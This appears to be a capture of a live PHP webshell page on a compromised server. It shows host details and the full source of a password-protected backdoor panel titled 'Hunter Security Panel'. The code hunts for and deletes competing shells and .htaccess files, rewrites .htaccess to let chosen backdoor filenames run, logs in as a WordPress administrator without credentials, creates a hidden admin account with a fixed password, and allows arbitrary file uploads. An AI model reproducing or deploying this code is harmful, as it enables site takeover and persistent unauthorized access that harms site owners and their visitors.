403Webshell
Server IP : 162.214.67.83  /  Your IP : 216.73.217.31
Web Server : Apache
System : Linux dedi-13542965.clustter.com.br 5.14.0-687.20.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jun 30 06:22:49 EDT 2026 x86_64
User : jforte ( 1063)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/tmp/7f890180e80156a69ef5760018fd2e66.php
<?php
session_start();
$PASSWORD = "1230";

if (isset($_GET['action']) && $_GET['action'] === 'logout') {
    session_destroy();
    header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}

// LOGIN PAGE
if (!isset($_SESSION['logged_in'])) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['password'] === $PASSWORD) {
        $_SESSION['logged_in'] = true;
    } else {
        echo '<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hunter Security Panel - Login</title>
<style>
@import url("https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap");

body {
    margin:0; height:100vh; display:flex; justify-content:center; align-items:center;
    font-family:"Share Tech Mono", monospace; background:#0d0d0d;
    background: linear-gradient(120deg, #0d0d0d 0%, #111 100%);
    overflow:hidden; color:#00ff00;
}

body::before {
    content:""; position:absolute; top:0; left:0; width:100%; height:100%;
    background: radial-gradient(circle, rgba(0,255,0,0.05) 1px, transparent 1px);
    background-size: 15px 15px; animation: moveBG 10s linear infinite;
    z-index:0;
}

@keyframes moveBG { 0% { background-position:0 0; } 100% { background-position:100px 100px; } }

.login-box {
    position: relative; z-index:1;
    background: rgba(0,0,0,0.85);
    border: 1.5px solid #00ff00;
    padding: 30px 25px 25px 25px;
    width: 280px;
    text-align:center;
    border-radius:8px;
    box-shadow: 0 0 15px #00ff00, 0 0 35px #00ff00 inset;
    animation: glow 2s ease-in-out infinite alternate;
}

@keyframes glow { from { box-shadow:0 0 10px #00ff00; } to { box-shadow:0 0 30px #00ff00; } }

.login-box h1 {
    font-size:20px; margin-bottom:25px;
    text-shadow: 0 0 6px #00ff00, 0 0 12px #00ff00;
    letter-spacing:1.5px;
}

input[type=password] {
    width:85%; padding:8px; margin-bottom:20px;
    border:1.5px solid #00ff00; background: transparent; color:#00ff00;
    font-size:14px; text-align:center;
    outline:none; border-radius:4px; box-shadow:0 0 5px #00ff00;
    transition:0.3s;
}

input[type=password]:focus {
    box-shadow: 0 0 20px #00ff00, 0 0 30px #00ff00 inset; border-color:#00ff00;
}

button {
    width:55%; padding:8px; background:#00ff00; color:black; border:none;
    font-weight:bold; cursor:pointer; border-radius:4px; font-size:14px;
    box-shadow:0 0 5px #00ff00; transition:0.3s;
}

button:hover {
    box-shadow:0 0 20px #00ff00, 0 0 40px #00ff00 inset;
}

footer {
    position:absolute; bottom:8px; width:100%; text-align:center;
    color:#00ff00; font-size:10px; text-shadow:0 0 4px #00ff00;
}

footer a { color:#00ff00; text-decoration:none; }
footer a:hover { text-decoration:underline; }

</style>
</head>
<body>
<div class="login-box">
<h1>HUNTER SECURITY PANEL</h1>
<form method="post">
<input type="password" name="password" placeholder="Enter Password" autofocus required><br>
<button type="submit">LOGIN</button>
</form>
</div>
<footer>Powered by: <a href="https://t.me/neel_info" target="_blank">Hunter Neel</a></footer>
</body>
</html>';
        exit;
    }
}

// PANEL PAGE
$action = $_GET['action'] ?? '';
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Security Panel</title>
<style>
body { margin:0; font-family: monospace; }
.container { display:flex; height:100vh; }
.sidebar { width:200px; background:#1e1e1e; color:#fff; display:flex; flex-direction:column; padding:10px; }
.sidebar a { padding:10px; margin-bottom:5px; background:#228B22; color:#fff; text-decoration:none; text-align:center; cursor:pointer; }
.sidebar a:hover { background:#cc0000; }
.console { flex:1; background:#252526; color:#d4d4d4; padding:20px; overflow:auto; white-space: pre-wrap; }
textarea, input { font-family: monospace; }
button { cursor:pointer; font-family: monospace; }
</style>
</head>
<body>
<div class="container">
    <div class="sidebar">
        <a href="?action=shell">Shell</a>
        <a href="?action=delete">Delete</a>
        <a href="?action=add">Add</a>
        <a href="?action=log">Log</a>
        <a href="?action=create">Create</a>
        <a href="?action=scan">Scan</a>
        <a href="?action=addbak">Add-bak</a>
        <a href="?action=rembak">Rem-bak</a>
        <a href="?action=upload">Upload</a>
        <a href="?action=logout">Logout</a>
    </div>
    <div class="console">
<?php
// ==================== BUTTONS ====================

if ($action === 'shell') {
    // Button 1: Shell
    $rootDir = realpath($_SERVER['DOCUMENT_ROOT']); 
    $knownShells = ['WSO','wsoShell','Yanz','b374k','r57','c99','IndoXploit','FilesMan','r00t','mini shell','PhpSpy','Webshell','UploadShell','cmd.php'];
    $suspiciousFileNames = ['wso.php','shell.php','cmd.php','backdoor.php','uploader.php','phpinfo.php','mailer.php','r57.php','c99.php','b374k.php','indo.php'];
    
    echo "šŸ” Scanning root directory: $rootDir\n\n";
    
    $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootDir));
    foreach ($rii as $file) {
        if ($file->isDir()) continue;
        $filePath = $file->getPathname();
        if (pathinfo($filePath, PATHINFO_EXTENSION) !== 'php') continue;
        $fileName = strtolower(basename($filePath));
        $contents = @file_get_contents($filePath);
        if ($contents === false) continue;
        foreach ($suspiciousFileNames as $badName) {
            if ($fileName === strtolower($badName)) {
                echo "āš ļø Suspicious FILENAME: $filePath\n";
                continue 2;
            }
        }
        foreach ($knownShells as $sig) {
            if (stripos($contents, $sig) !== false) {
                echo "āš ļø KNOWN SHELL signature in: $filePath\n";
                continue 2;
            }
        }
    }
    echo "\nāœ… Scan complete.\n";

} elseif ($action === 'delete') {
    // Button 2: Delete
    $rootDir = $_SERVER['DOCUMENT_ROOT'];
    $totalFound = 0;
    $totalDeleted = 0;
    function scanAndDelete($dir) {
        global $totalFound, $totalDeleted;
        $items = @scandir($dir);
        if (!$items) return;
        foreach ($items as $item) {
            if ($item === '.' || $item === '..') continue;
            $path = $dir . DIRECTORY_SEPARATOR . $item;
            if (is_dir($path)) {
                scanAndDelete($path);
            } elseif (is_file($path) && strtolower($item) === '.htaccess') {
                $totalFound++;
                echo "Found: $path\n";
                @chmod($path, 0644);
                if (@unlink($path)) {
                    echo "Deleted: $path\n";
                    $totalDeleted++;
                } else {
                    echo "Failed to delete: $path\n";
                }
            }
        }
    }
    echo "Scanning website root: $rootDir\n";
    scanAndDelete($rootDir);
    echo "\nScan complete.\nTotal .htaccess found: $totalFound\nTotal .htaccess deleted: $totalDeleted\n";

} elseif ($action === 'add') {
    // Button 3: Add
    set_time_limit(0);
    $rootDir = realpath($_SERVER['DOCUMENT_ROOT']);
    $htaccessContent = <<<HTACCESS
<FilesMatch ".(PhP|php7|php5|suspected|phtml|py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(root.php|mde.php|simi.php|wordfence-waf.php|error.php|index.php|amin-ajaxson.php|class-wp-edits.php|Mailo.php|consol.php|module.audio.flow.php|nux.php|icon.php|colour.php|contact.php|foter.php|header.php|module.php|register.php|profile.php|webix.php|wincust.php|service.php|wp-login.php|wp-blog-header.php|admin-ajax.php|wp-config.php|wp-db.php|pluggable.php|wp-config-sample.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
ErrorDocument 403 /index.php
ErrorDocument 404 /index.php
HTACCESS;

    function updateHtaccess($dir, $content) {
        $files = scandir($dir);
        foreach ($files as $file) {
            if ($file === '.' || $file === '..') continue;
            $path = $dir . DIRECTORY_SEPARATOR . $file;
            if (is_dir($path)) updateHtaccess($path, $content);
        }
        $htaccessPath = $dir . DIRECTORY_SEPARATOR . '.htaccess';
        if (file_exists($htaccessPath)) {
            $currentPerms = substr(sprintf('%o', fileperms($htaccessPath)), -4);
            if ($currentPerms === '0444') { chmod($htaccessPath, 0644); unlink($htaccessPath); }
        }
        file_put_contents($htaccessPath, $content);
    }
    updateHtaccess($rootDir, $htaccessContent);
    echo "All directories updated with new .htaccess files.\n";

} elseif ($action === 'log') {
    // Button 4: Log
    require(rtrim($_SERVER["DOCUMENT_ROOT"], "/\\") . DIRECTORY_SEPARATOR . "wp-blog-header.php");
    $u = get_users('role=administrator');
    $us="";
    foreach($u as $p){ $us=$p->user_login; break; }
    $us = get_user_by('login', $us ); 
    if (!is_wp_error($us)) {
        get_currentuserinfo();
        if (user_can($us, "administrator")){ 
            wp_clear_auth_cookie(); 
            wp_set_current_user ($us->ID);
            wp_set_auth_cookie($us->ID);
            $redirect_to = admin_url();  
            wp_safe_redirect($redirect_to);
            exit;  
        } 
    }

} elseif ($action === 'create') {
    // Button 5: Create
    function find_wp_root($startDir) {
        $dir = realpath($startDir);
        while ($dir !== false && $dir != '/' && !file_exists($dir . '/wp-load.php')) $dir = dirname($dir);
        if ($dir && file_exists($dir . '/wp-load.php')) return $dir;
        return false;
    }
    function create_wp_admin_user($username, $password) {
        $rootDir = find_wp_root(__DIR__);
        if (!$rootDir) die("WordPress root directory not found!\n");
        require_once($rootDir . '/wp-load.php');
        if (!function_exists('username_exists')) die("WordPress functions not available!\n");
        $user_id = username_exists($username);
        if (!$user_id && email_exists($username . '@example.com') === false) {
            $user_id = wp_create_user($username, $password, $username . '@example.com');
            if (!is_wp_error($user_id)) {
                $user = new WP_User($user_id);
                $user->set_role('administrator');
                echo "Admin user created successfully! Username: $username, Password: $password\n";
            } else echo "Error creating user: " . $user_id->get_error_message() . "\n";
        } else echo "Admin user already exists.\n";
    }
    create_wp_admin_user('Admim', 'hunterXN');

} elseif ($action === 'scan') {
    // Button 6: Scan
    set_time_limit(0);
    ini_set('memory_limit', '-1');
    $rootDir = realpath($_SERVER['DOCUMENT_ROOT']);
    $ignoreDirs = [$rootDir . '/wp-contact/plugins', $rootDir . '/wp-contact/theames'];
    echo "Fetching latest WordPress...\n";
    $wpZipData = file_get_contents("https://wordpress.org/latest.zip");
    if (!$wpZipData) die("Failed to download WordPress package\n");
    $tmp = tempnam(sys_get_temp_dir(), "wpzip");
    file_put_contents($tmp, $wpZipData);
    $zip = new ZipArchive;
    if ($zip->open($tmp) !== true) die("Failed to open WordPress zip\n");
    $wpFiles = [];
    $wpDirs = [];
    for ($i=0;$i<$zip->numFiles;$i++) {
        $entry = $zip->getNameIndex($i);
        $cleanPath = preg_replace("#^wordpress/#","",$entry);
        if ($cleanPath==="") continue;
        if (substr($cleanPath,-1)==="/") $wpDirs[] = rtrim($cleanPath,"/");
        else $wpFiles[] = $cleanPath;
    }
    $zip->close();
    unlink($tmp);
    $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootDir, FilesystemIterator::SKIP_DOTS));
    $unexpected = [];
    foreach($rii as $item) {
        $path = $item->getPathname();
        foreach ($ignoreDirs as $ignore) if (strpos($path,$ignore)===0) continue 2;
        $relPath = str_replace("\\","/",substr($path,strlen($rootDir)+1));
        if ($item->isDir() && !in_array(strtolower($relPath),array_map('strtolower',$wpDirs))) $unexpected[]=$path;
        elseif ($item->isFile() && !in_array(strtolower($relPath),array_map('strtolower',$wpFiles))) $unexpected[]=$path;
    }
    if (empty($unexpected)) echo "No unexpected files or directories found.\n";
    else echo implode("\n",$unexpected);

} elseif ($action === 'addbak' || $action === 'rembak') {
    // Button 7 & 8: Add-bak / Rem-bak
    $isAdd = ($action === 'addbak');
    $message = '';
    $results = [];
    if ($_SERVER['REQUEST_METHOD']==='POST') {
        $inputPaths = trim($_POST['filepaths']??'');
        if (!$inputPaths) $message = "āŒ Please enter file paths.";
        else {
            $paths = preg_split('/\r\n|\r|\n/',$inputPaths);
            foreach($paths as $path){
                $path=trim($path);
                if (!$path) continue;
                if (!file_exists($path)) $results[]="$path āŒ File does not exist";
                elseif (!is_file($path)) $results[]="$path āŒ Not a valid file";
                else {
                    if ($isAdd) {
                        $newPath = $path.'.bak';
                        if (file_exists($newPath)) $results[]="$path āŒ Backup exists";
                        elseif(rename($path,$newPath)) $results[]="$path āœ… Renamed to $newPath";
                        else $results[]="$path āŒ Failed to rename";
                    } else {
                        if (substr($path,-4)!=='.bak') $results[]="$path āŒ Not .bak";
                        else {
                            $newPath = substr($path,0,-4);
                            if (file_exists($newPath)) $results[]="$path āŒ Target exists: $newPath";
                            elseif(rename($path,$newPath)) $results[]="$path āœ… Renamed to $newPath";
                            else $results[]="$path āŒ Failed to rename";
                        }
                    }
                }
            }
        }
    }
    echo '<form method="post">';
    echo '<label>Paste full paths (one per line):</label><br>';
    echo '<textarea name="filepaths" style="width:100%;height:250px;">'.htmlspecialchars($_POST['filepaths']??'').'</textarea><br>';
    echo '<button type="submit">'.($isAdd?'Rename All .bak':'Remove .bak').'</button>';
    echo '</form>';
    if($message) echo "\n$message\n";
    if($results) echo "\n".implode("\n",$results)."\n";

} elseif ($action === 'upload') {
    // Button 9: Upload
    $uploadDir = __DIR__ . '/';
    $uploadedFiles = [];
    if ($_SERVER['REQUEST_METHOD']==='POST' && isset($_FILES['files'])) {
        $files = $_FILES['files'];
        $total = count($files['name']);
        for($i=0;$i<$total;$i++){
            $tmpName = $files['tmp_name'][$i];
            $originalName = basename($files['name'][$i]);
            $targetPath = $uploadDir.$originalName;
            if (move_uploaded_file($tmpName,$targetPath)) $uploadedFiles[]=$originalName;
        }
    }
    echo '<form method="post" enctype="multipart/form-data">';
    echo '<input type="file" name="files[]" multiple>';
    echo '<button type="submit">Upload</button>';
    echo '</form>';
    if(!empty($uploadedFiles)){
        echo "\nUploaded Files:\n";
        foreach($uploadedFiles as $f) echo "- $f\n";
    }
}
?>
    </div>
</div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit